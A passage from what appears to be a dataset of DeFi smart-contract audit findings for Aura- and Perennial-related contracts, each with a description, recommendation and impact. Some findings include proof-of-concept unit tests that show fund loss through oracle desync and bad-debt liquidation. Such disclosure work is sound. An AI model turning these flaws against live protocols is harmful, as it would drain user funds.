This means that the rewards will be realized for a majority of users before they themselves withdraw. Since the emissions decrease with each cliff, there will be loss of funds at the end of each cliff.\\nExample: Assume for simplicity there are only 2 cliffs. User A deposits LP to WAuraPools. After some time User B deposits as well. Before the end of the first cliff User A withdraw. This claims all tokens owed to both users A and B which is now sitting in the contract. Assume both users are owed 10 tokens. Now User B waits for the second cliff to end before withdrawing. When calculating his rewards it will give him no rewards since all cliffs have ended. The issue is that the 10 tokens they are owed is already sitting in the contract waiting to be claimed.чI would recommend a hybrid approach. When rewards are claimed upon withdrawal, the reward per token should be cached to prevent loss of tokens that have already been received by the contract. Only unminted AURA should be handled this way.чAll users will lose rewards at the end of each cliff due to miscalculationч```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. 
amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n -Invalid oracle versions can cause desync of global and local positions making protocol lose funds and being unable to pay back all usersчhighчIn more details, if there are 2 pending positions with timestamps different by 2 oracle versions and the first of them has invalid oracle version at its timestamp, then there are 2 different position flows possible depending on the time when the position is settled (update transaction called):\\nFor earlier update the flow is: previous position (oracle v1) -> position 1 (oracle v2) -> position 2 (oracle v3)\\nFor later update position 1 is skipped completely (the fees for the position are also not taken) and the flow is: previous position (oracle v1) -> invalidated position 1 (in the other words: previous position again) (oracle v2) -> position 2 (oracle v3)\\nWhile the end result (position 2) is the same, it's possible that pending global position is updated earlier (goes the 1st path), while the local position is updated later (goes the 2nd path). For a short time (between oracle versions 2 and 3), the global position will accumulate everything (including profit and loss) using the pending position 1 long/short/maker values, but local position will accumulate everything using the previous position with different values.\\nConsider the following scenario: Oracle uses granularity = 100. Initially user B opens position maker = 2 with collateral = 100. 
T=99: User A opens long = 1 with collateral = 100 (pending position long=1 timestamp=100) T=100: Oracle fails to commit this version, thus it becomes invalid T=201: At this point oracle version at timestamp 200 is not yet commited, but the new positions are added with the next timestamp = 300: User A closes his long position (update(0,0,0,0)) (pending position: long=1 timestamp=100; long=0 timestamp=300) At this point, current global long position is still 0 (pending the same as user A local pending positions)\\nT=215: Oracle commits version with timestamp = 200, price = $100 T=220: User B settles (update(2,0,0,0) - keeping the same position). At this point the latest oracle version is the one at timestamp = 200, so this update triggers update of global pending positions, and current latest global position is now long = 1.0 at timestamp = 200. T=315: Oracle commits version with timestamp = 300, price = $90 after settlement of both UserA and UserB, we have the following:\\nGlobal position settlement. It accumulates position [maker = 2.0, long = 1.0] from timestamp = 200 (price=$100) to timestamp = 300 (price=$90). In particular: longPnl = 1*($90-$100) = -$10 makerPnl = -longPnl = +$10\\nUser B local position settlement. It accumulates position [maker = 2.0] from timestamp = 200 to timestamp = 300, adding makerPnl ($10) to user B collateral. So user B collateral = $110\\nUser A local position settlement. When accumulating, pending position 1 (long = 1, timestamp = 100) is invalidated to previous position (long = 0) and also fees are set to 0 by invalidation. So user A local accumulates position [long = 0] from timestamp = 0 to timestamp = 300 (next pending position), this doesn't change collateral at all (remains $100). 
Then the next pending position [long = 0] becomes the latest position (basically position of long=1 was completely ignored as if it has not existed).\\nResult: User A deposited $100, User B deposited $100 (total $200 deposited) after the scenario above: User A has collateral $110, User B has collateral $100 (total $210 collateral withdrawable) However, protocol only has $200 deposited. This means that the last user will be unable to withdraw the last $10 since protocol doesn't have it, leading to a user loss of funds.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral deposit maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral deposit long: \" 
+ info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral long: \" + info.collateral);\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral deposit maker: 100000000\\ncollateral deposit long: 100000000\\ncollateral maker: 110000028\\ncollateral long: 100000000\\n```\\n\\nMaker has a bit more than $110 in the end, because he also earns funding and interest during the short time 
when ephemeral long position is active (but user A doesn't pay these fees).чThe issue is that positions with invalid oracle versions are ignored until the first valid oracle version, however the first valid version can be different for global and local positions. One of the solutions I see is to introduce a map of position timestamp -> oracle version to settle, which will be filled by global position processing. Local position processing will follow the same path as global using this map, which should eliminate possibility of different paths for global and local positions.\\nIt might seem that the issue can only happen with exactly 1 oracle version between invalid and valid positions. However, it's also possible that some non-requested oracle versions are commited (at some random timestamps between normal oracle versions) and global position will go via the route like t100[pos0]->t125[pos1]->t144[pos1]->t200[pos2] while local one will go t100[pos0]->t200[pos2] OR it can also go straight to t300 instead of t200 etc. So the exact route can be anything, and local oracle will have to follow it, that's why I suggest a path map.\\nThere might be some other solutions possible.чAny time the oracle skips a version (invalid version), it's likely that global and local positions for different users who try to trade during this time will desync, leading to messed up accounting and loss of funds for users or protocol, potentially triggering a bank run with the last user being unable to withdraw all funds.\\nThe severity of this issue is high, because while invalid versions are normally a rare event, however in the current state of the codebase there is a bug that pyth oracle requests are done using this block timestamp instead of granulated future time (as positions do), which leads to invalid oracle versions almost for all updates (that bug is reported separately). 
Due to this other bug, the situation described in this issue will arise very often by itself in a normal flow of the user requests, so it's almost 100% that internal accounting for any semi-active market will be broken and total user collateral will deviate away from real deposited funds, meaning the user funds loss.\\nBut even with that other bug fixed, the invalid oracle version is a normal protocol event and even 1 such event might be enough to break internal market accounting.ч```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral deposit maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral deposit long: \" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: 
false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral long: \" + info.collateral);\\n})\\n```\\n -Protocol fee from Market.sol is lockedчhighчHere is `MarketFactory#fund` function:\\n```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n\\nThis is `Market#claimFee` function:\\n```\\n function claimFee() external {\\n Global memory newGlobal = _global.read();\\n\\n if (_claimFee(address(factory()), 
newGlobal.protocolFee)) newGlobal.protocolFee = UFixed6Lib.ZERO;\\n // rest of code\\n }\\n```\\n\\nThis is the internal `_claimFee` function:\\n```\\n function _claimFee(address receiver, UFixed6 fee) private returns (bool) {\\n if (msg.sender != receiver) return false;\\n\\n token.push(receiver, UFixed18Lib.from(fee));\\n emit FeeClaimed(receiver, fee);\\n return true;\\n }\\n```\\n\\nAs we can see, when `MarketFactory#fund` is called, Market#claimFee gets called which will send the protocolFee to msg.sender(MarketFactory). When you check through the MarketFactory contract, there is no place where another address(such as protocol multisig, treasury or an EOA) is approved to spend MarketFactory's funds, and also, there is no function in the contract that can be used to transfer MarketFactory's funds. This causes locking of the protocol fees.чConsider adding a `withdraw` function that protocol can use to get the protocolFee out of the contract. You can have the `withdraw` function transfer the MarketFactory balance to the treasury or something.чProtocol fees cannot be withdrawnч```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n -PythOracle:if price.expo is less than 0, wrong prices will be recordedчhighчHere is PythOracle#_recordPrice function:\\n```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? 
price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n\\nIf price is 5e-5 for example, it will be recorded as 5e5 If price is 5e-6, it will be recorded as 5e6.\\nAs we can see, there is a massive deviation in recorded price from actual price whenever price's exponent is negativeчIn PythOracle.sol, `_prices` mapping should not be `mapping(uint256 => Fixed6) private _prices;` Instead, it should be `mapping(uint256 => Price) private _prices;`, where Price is a struct that stores the price and expo:\\n```\\nstruct Price{\\n Fixed6 price,\\n int256 expo\\n}\\n```\\n\\nThis way, the price exponents will be preserved, and can be used to scale the prices correctly wherever it is used.чWrong prices will be recorded. For example, If priceA is 5e-5, and priceB is 5e-6. But due to the wrong conversion,\\nThere is a massive change in price(5e5 against 5e-5)\\nwe know that priceA is ten times larger than priceB, but priceA will be recorded as ten times smaller than priceB. Unfortunately, current payoff functions may not be able to take care of these discrepanciesч```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? 
price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n -Vault.sol: `settle`ing the 0 address will disrupt accountingчhighчWithin `Vault#_loadContext` function, the context.global is the account of the 0 address, while context.local is the account of the address to be updated or settled:\\n```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n\\nIf a user settles the 0 address, the global account will be updated with wrong data.\\nHere is the _settle logic:\\n```\\nfunction _settle(Context memory context) private {\\n // settle global positions\\n while (\\n context.global.current > context.global.latest &&\\n _mappings[context.global.latest + 1].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.global.latest + 1;\\n context.latestCheckpoint = _checkpoints[newLatestId].read();\\n (Fixed6 collateralAtId, UFixed6 feeAtId, UFixed6 keeperAtId) = _collateralAtId(context, newLatestId);\\n context.latestCheckpoint.complete(collateralAtId, feeAtId, keeperAtId);\\n context.global.processGlobal(\\n newLatestId,\\n context.latestCheckpoint,\\n context.latestCheckpoint.deposit,\\n context.latestCheckpoint.redemption\\n );\\n _checkpoints[newLatestId].store(context.latestCheckpoint);\\n }\\n\\n // settle local position\\n if (\\n context.local.current > context.local.latest &&\\n _mappings[context.local.current].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.local.current;\\n Checkpoint memory checkpoint = _checkpoints[newLatestId].read();\\n context.local.processLocal(\\n newLatestId,\\n checkpoint,\\n context.local.deposit,\\n context.local.redemption\\n );\\n }\\n}\\n```\\n\\nIf settle is called on 0 address, _loadContext will give context.global 
and context.local same data. In the _settle logic, after the global account(0 address) is updated with the correct data in the `while` loop(specifically through the processGlobal function), the global account gets reupdated with wrong data within the `if` statement through the processLocal function.\\nWrong assets and shares will be recorded. The global account's assets and shares should be calculated with toAssetsGlobal and toSharesGlobal respectively, but now, they are calculated with toAssetsLocal and toSharesLocal.\\ntoAssetsGlobal subtracts the globalKeeperFees from the global deposited assets, while toAssetsLocal subtracts globalKeeperFees/Checkpoint.count fees from the local account's assets.\\nSo in the case of settling the 0 address, where global account and local account are both 0 address, within the while loop of _settle function, depositedAssets-globalKeeperFees is recorded for address(0), but then, in the `if` statement, depositedAssets-(globalAssets/Checkpoint.count) is recorded for address(0)\\nAnd within the `Vault#_saveContext` function, context.global is saved before context.local, so in this case, context.global(which is 0 address with correct data) is overridden with context.local(which is 0 address with wrong data).чI believe that the ability to settle the 0 address is intended, so an easy fix is to save local context before saving global context: Before:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[address(0)].store(context.global);\\n _accounts[account].store(context.local);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n\\nAfter:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[account].store(context.local);\\n _accounts[address(0)].store(context.global);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\nчThe global account will be updated with wrong data, that is, global assets 
and shares will be higher than it should be because lower keeper fees was deducted.ч```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n -During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix itчmediumчThe way oracle provider switch works is the following:\\n`Oracle.update()` is called to set a new provider. This is only allowed if there is no other provider switch pending.\\nThere is a brief transition period, when both the previous provider and a new provider are active. This is to ensure that all the requests made to the previous oracle are commited before switching to a new provider. This is handled by the `Oracle._handleLatest()` function, in particular the switch to a new provider occurs only when `Oracle.latestStale()` returns true. The lines of interest to us are:\\n```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n\\n`latestTimestamp` - is the timestamp of last commited price for the previous provider `oracles[global.latest].timestamp` is the timestamp of the last requested price for the previous provider The switch doesn't occur, until last commited price is equal to or after the last request timestamp for the previous provider. 3. The functions to `commit` the price are in PythOracle: `commitRequested` and `commit`. 3.1. `commitRequested` requires publish timestamp of the pyth price to be within MIN_VALID_TIME_AFTER_VERSION..MAX_VALID_TIME_AFTER_VERSION from request time. 
It is possible that pyth price with signature in this time period is not available for different reasons (pyth price feed is down, keeper was down during this period and didn't collect price and signature):\\n```\\n uint256 versionToCommit = versionList[versionIndex];\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(versionToCommit, updateData);\\n```\\n\\n`versionList` is an array of oracle request timestamps. And `_validateAndGetPrice()` filters the price within the interval specified (if it is not in the interval, it will revert):\\n```\\n return pyth.parsePriceFeedUpdates{value: pyth.getUpdateFee(updateDataList)}(\\n updateDataList,\\n idList,\\n SafeCast.toUint64(oracleVersion + MIN_VALID_TIME_AFTER_VERSION),\\n SafeCast.toUint64(oracleVersion + MAX_VALID_TIME_AFTER_VERSION)\\n )[0].price;\\n```\\n\\n3.2. `commit` can not be done with timestamp older than the first oracle request timestamp: if any oracle request is still active, it will simply redirect to commitRequested:\\n```\\n if (versionList.length > nextVersionIndexToCommit && oracleVersion >= versionList[nextVersionIndexToCommit]) {\\n commitRequested(nextVersionIndexToCommit, updateData);\\n return;\\n }\\n```\\n\\nAll new oracle requests are directed to a new provider, this means that previous provider can not receive any new requests (which allows to finalize it):\\n```\\n function request(address account) external onlyAuthorized {\\n (OracleVersion memory latestVersion, uint256 currentTimestamp) = oracles[global.current].provider.status();\\n\\n oracles[global.current].provider.request(account);\\n oracles[global.current].timestamp = uint96(currentTimestamp);\\n _updateLatest(latestVersion);\\n }\\n```\\n\\nSo the following scenario is possible: timestamp=69: oracle price is commited for timestamp=50 timestamp=70: user requests to open position (Oracle.request() is made) timestamp=80: owner calls `Oracle.update()` timestamp=81: pyth price signing service goes offline (or keeper goes 
offline) ... timestamp=120: signing service goes online again. timestamp=121: another user requests to open position (Oracle.request() is made, directed to new provider) timestamp=200: new provider's price is commited (commitRequested is called with timestamp=121)\\nAt this time, `Oracle.latest()` will return price at timestamp=50. It will ignore new provider's latest commit, because previous provider last request (timestamp=70) is still not commited. Any new price requests and commits to a new provider will be ignored, but the previous provider can not be commited due to absence of prices in the valid time range. It is also not possible to change oracle for the market, because there is no such function. It is also impossible to cancel provider update and impossible to change the provider back to previous one, as all of these will revert.\\nIt is still possible for the owner to manually whitelist some address to call `request()` for the previous provider. However, this situation provides even worse result. While the latest version for the previous provider will now be later than the last request, so it will let the oracle switch to new provider, however `oracle.status()` will briefly return invalid oracle version, because it will return oracle version at the timestamp = last request before the provider switch, which will be invalid (the new request will be after that timestamp):\\nThis can be abused by some user who can backrun the previous provider oracle commit (or commit himself) and use the invalid oracle returned by `status()` (oracle version with price = 0). Market doesn't expect the oracle status to return invalid price (it is expected to be always valid), so it will use this invalid price as if it's a normal price = 0, which will totally break the market:\\nSo if the oracle provider switch becomes stuck, there is no way out and the market will become stale, not allowing any user to withdraw the funds.чThere are multiple possible ways to fix this. 
For example, allow finalizing the previous provider if the latest `commit` from the new provider is newer than the latest `commit` from the previous provider by `GRACE_PERIOD` seconds. Or allow PythOracle to `commit` directly (instead of via commitRequested) if the `commit` oracleVersion is newer than the last request by `GRACE_PERIOD` seconds.чIssue During oracle provider switch, if it is impossible to commit the last request of the previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it\\nSwitching oracle provider can make the oracle stuck and stop updating new prices. This will mean the market will become stale and will revert on all user requests, disallowing withdrawal of funds, bricking the contract entirely.ч```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n -Bad debt (shortfall) liquidation leaves liquidated user in a negative collateral balance which can cause bank run and loss of funds for the last users to withdrawчmediumчConsider the following scenario:\\nUser1 and User2 are the only makers in the market each with maker=50 position and each with collateral=500. (price=$100)\\nA new user comes into the market and opens long=10 position with collateral=10.\\nPrice drops to $90. Some liquidator liquidates the user, taking $10 liquidation fee. User is now left with the negative collateral = -$100\\nSince User1 and User2 were the other party for the user, each of them has a profit of $50 (both users have collateral=550)\\nAt this point protocol has total funds from deposit of User1($500) + User2($500) + new user($10) - liquidator($10) = $1000. However, User1 and User2 have total collateral of 1100.\\nUser1 closes position and withdraws $550. This succeeds. 
Protocol now has only $450 funds remaining and 550 collateral owed to User2.\\nUser2 closes position and tries to withdraw $550, but fails, because protocol doesn't have enough funds. User2 can only withdraw $450, effectively losing $100.\\nSince all users know about this feature, after bad debt they will race to be the first to withdraw, triggering a bank run.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n 
makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral before liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await 
market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral after liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral before liquidation: 10000000 + 500000000 + 500000000 = 1010000000\\ncollateral after liquidation: -100000080 + 550000000 + 550000000 = 999999920\\n```\\n\\nAfter initial total deposit of $1010, in the end liquidated user will just abandon his account, and remaining user accounts have $550+$550=$1100 but only $1000 funds in the protocol to withdraw.чThere should be no negative collateral accounts with 0-position and no incentive to cover shortfall. When liquidated, if account is left with negative collateral, the bad debt should be added to the opposite position pnl (long position bad debt should be socialized between short position holders) or maybe to makers pnl only (socialized between makers). The account will have to be left with collateral = 0.\\nImplementation details for such solution can be tricky due to settlement in the future (pnl is not known at the time of liquidation initiation). Possibly a 2nd step of bad debt liquidation should be added: a keeper will call the user account to socialize bad debt and get some reward for this. Although this is not the best solution, because users who close their positions before the keeper socializes the bad debt, will be able to avoid this social loss. 
One of the solutions for this will be to introduce delayed withdrawals and delayed socialization (like withdrawals are allowed only after 5 oracle versions and socialization is applied to all positions opened before socialization and still active or closed within 5 last oracle versions), but it will make protocol much more complicated.чAfter ANY bad debt, the protocol collateral for all non-negative users will be higher than protocol funds available, which can cause a bank run and a loss of funds for the users who are the last to withdraw.\\nEven if someone covers the shortfall for the user with negative collateral, this doesn't guarantee absence of bank run:\\nIf the shortfall is not covered quickly for any reason, the other users can notice disparency between collateral and funds in the protocol and start to withdraw\\nIt is possible that bad debt is so high that any entity (\"insurance fund\") just won't have enough funds to cover it.ч```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: 
